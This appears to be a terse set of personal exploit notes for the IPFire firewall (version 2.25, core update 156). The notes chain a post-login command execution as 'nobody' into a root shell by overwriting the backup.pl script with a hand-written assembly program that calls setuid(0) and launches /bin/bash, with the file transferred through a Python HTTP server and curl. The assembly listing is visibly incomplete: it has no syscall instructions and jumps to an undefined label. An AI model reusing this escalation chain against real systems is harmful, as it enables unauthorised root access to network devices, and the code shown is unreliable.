- system run command when install any packet
- system getting 7zip from just html
- and check the tmp directory
- version 2.25 - core update 156
- ipfire allows run arbitrary os command as nobody after login
- check the suid binaries
- backup program run another script. /var/ipfire/backup/bin/backup.pl (it is a bash script and permission is looky good)
- try the write in to bash script. (No error. GOOD!)
- try run bash
- yes. we can run but it is low-privegled. we must trig to setuid(0)!
- save this and run
alti name.asm q
- alti is my own compile-check program in soo_deep repo.
bits 64
section .data
string db "/bin/bash",0x00
olmadis db "basarisiz.",0x0a,0x00
olmadil equ $-olmadis
section .text
global main
mov rax,105
mov rdi,0
cmp rax,0
je getbash
mov rax,1
mov rdi,1
mov rsi,olmadis
mov rdx,olmadil
mov rax,60
xor rdi,rdi
mov rax,59
mov rdi,string
mov rsi,0
mov rdx,0
and write the new program to /var/ipfire/backup/bin/backup.pl. (we can python http server and curl to write)
and enjoy the root shell!